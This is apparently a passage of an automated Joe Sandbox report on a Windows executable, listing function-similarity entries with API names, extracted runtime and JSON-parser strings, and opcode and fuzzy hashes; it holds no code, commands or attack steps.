                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f497c1ce9e5e04c61fb24ff877b0b05fda8846542b56cd27f43f2303514b95d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35518F32A0CA81C5EB80EF24D4923A973A0FB84B88F548532DB4C93BA9DF3DD445DB40
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                                                                          • API String ID: 2775327233-1405518554
                                                                                                                                                                                                                                                                                          • Opcode ID: 81cb8670b555a8e31db84782e2a5718fe23077a2ab266310f93b689cb9081599
                                                                                                                                                                                                                                                                                          • Instruction ID: c6403b64627e8f5229e1e2048b47839c18988977354d071a86056212d1498d72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81cb8670b555a8e31db84782e2a5718fe23077a2ab266310f93b689cb9081599
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03414F22B0EA41D9EB94FFB1D4526FC23A4AF64748F044434DE4DB7AA5DE38D512E304
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                          • Opcode ID: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
                                                                                                                                                                                                                                                                                          • Instruction ID: cc2ed51d1631064780b9f4c77093934af05006f22ca35cfea620809213d1be53
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68D1EE22B1CA818AF750EF69D4416BC37B2EB44B98B144236CE5DA7BD9DF38D50AD340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                                                                                                                                          • Instruction ID: 7a85f2f13a8e2b3270c043f7ebec2b6f6a3f525c3b99c50e71cfb0ab6ce7e98e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6941606790C685C6EB92BF25C4122BD3FA0AF55F84F199071C68C973CADE3D944AE312
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 203985260-0
                                                                                                                                                                                                                                                                                          • Opcode ID: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                                                                                                                                          • Instruction ID: 71b5e29fb42699d44208460216d73b630d43126d1f5557cbf7de81a407e498fd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04215E72A18B4187E390AF11E40532E76B4FB99B80F144139DB88A3BA9DF3CD4018B00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                                                                                                                                          • Instruction ID: 0afb113ea509175926a7fdedaf75cc63ce54dd22b1163c62a5333d66271bcf84
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF117022B18F028AEB80EF60E8552B833A4FB59758F040E31EE2D977E4DF78D1548340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorFileHandleInformationLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 275135790-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                                                                                                                                          • Instruction ID: 1d01c9205b65e767e142576008c4c015606cdda7822a2a496e438d83eab87894
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0D173A0C14282F7E57F70E4562FD36A09F60744F144130CA0AE35F5DE2CEA88A700
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Bad escape sequence in string$Empty escape sequence in string
                                                                                                                                                                                                                                                                                          • API String ID: 0-928816353
                                                                                                                                                                                                                                                                                          • Opcode ID: f45f751ed646c75d4ef6e0c233ee33919e43e3e978761b2a3d09f0e6ffb0bada
                                                                                                                                                                                                                                                                                          • Instruction ID: 06907f8919959c740018f2f365ca892b9276ca7e41cf40a27e9c15408986e0c7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f45f751ed646c75d4ef6e0c233ee33919e43e3e978761b2a3d09f0e6ffb0bada
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6881F033A0D78286EB85BF25D54267D7761EB51BD4F148232DE5DA3BDADE2CE081A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                                          • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                                                                                          • Opcode ID: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                                                                                                                                          • Instruction ID: d3f3f7d57bb71e7c093d47426371b303ea39a801083fcc12ec4e6f8d4f348daa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71C07290C68186EBA0BF25D05177D7BA0FB15B89F14A135DA4CA7AC9CF2CD452E700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: $in Json::Value::getMemberNames(), value must be objectValue
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-828478770
                                                                                                                                                                                                                                                                                          • Opcode ID: 94ceb3c93b4d6312538c39f797ebae8cf8a178e57db0026f79b34a9f1722b791
                                                                                                                                                                                                                                                                                          • Instruction ID: e6b2b084e23ff0725310948c6d1c9d8242f50d266c1b9bc5428abbefac3c5329
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94ceb3c93b4d6312538c39f797ebae8cf8a178e57db0026f79b34a9f1722b791
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA51C572A1CB8581EA50FF54E4421AEA360FB857D4F509232E69C53EEADF7CE491D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00007FF643F50E95
                                                                                                                                                                                                                                                                                          • additional six characters expected to parse unicode surrogate pair., xrefs: 00007FF643F50DB2
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-1961466578
                                                                                                                                                                                                                                                                                          • Opcode ID: 822c04dc8235e0eebf450844a94c68a091e3b72538353c26546d0cdae63bb6e3
                                                                                                                                                                                                                                                                                          • Instruction ID: 8d333aedd6dccb9fbb7d3ef7f071db18a58cc8dfbf773c21613f0316161f01ed
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 822c04dc8235e0eebf450844a94c68a091e3b72538353c26546d0cdae63bb6e3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A411862E1C78741EA90BE25E4422796350EB957D4F149231FE9EA37DBDE3CE181A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: egjidjbpglichdcondbcbdnbeeppgdph
                                                                                                                                                                                                                                                                                          • API String ID: 73155330-1098953746
                                                                                                                                                                                                                                                                                          • Opcode ID: df608a23cbcb3254a10407cb4a3e8e0846cec37c94d7d8e838b6c68aa0c23caa
                                                                                                                                                                                                                                                                                          • Instruction ID: 48a226c6d75b779677c926479bbc488a13a5a5d933e6f15574ce64abf9e126a8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df608a23cbcb3254a10407cb4a3e8e0846cec37c94d7d8e838b6c68aa0c23caa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9341D061B0DA8191EA94FB11D20527D6290BB64BE8FA40731DE7DA7BD5EF3CE056D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                          • Opcode ID: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
                                                                                                                                                                                                                                                                                          • Instruction ID: c2b8e96a4e02faf624c982784873fc2f351115b073625bcf2b9c024ea3798630
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99411622A0C38246FBE4BB25A40237A6A60EF81BA4F544236FF5C97AD5EF3CD441D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                          • API String ID: 2558813199-1018135373
                                                                                                                                                                                                                                                                                          • Opcode ID: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
                                                                                                                                                                                                                                                                                          • Instruction ID: c28f3f5812738ec83a79e5f5a475327883f5aaa6ea154c680454e85d561f50ce
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A514D72A1DB4186E6A0FB15E04226D77B4FB89B90F102535DB8D97B96CF3CE452DB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Bad unicode escape sequence in string: four digits expected., xrefs: 00007FF643F50F60
                                                                                                                                                                                                                                                                                          • Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00007FF643F5103D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-3825735986
                                                                                                                                                                                                                                                                                          • Opcode ID: 0c2e9f55a7f65a032be0d18626717429307942a2f3de7192f147379158a827ed
                                                                                                                                                                                                                                                                                          • Instruction ID: 4204eb6d4d1ca201a738f648c56df80e25d8b66102563967ebf3ee5b37039ddc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c2e9f55a7f65a032be0d18626717429307942a2f3de7192f147379158a827ed
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4411493E1C68541EA50FE26E4026BD2351FB957E4F409331FE6DE36DAEE2CE1819700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                          • Opcode ID: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                                                                                                                                          • Instruction ID: b4058b2966a209e6cd2df6e1f439c1f8b9ff2a19160a2984c7edf564f834fea5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41A062B2CA4282DBA0BF25E8467BA67A0FB88784F854031EE4DD7794EF7CD445D740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
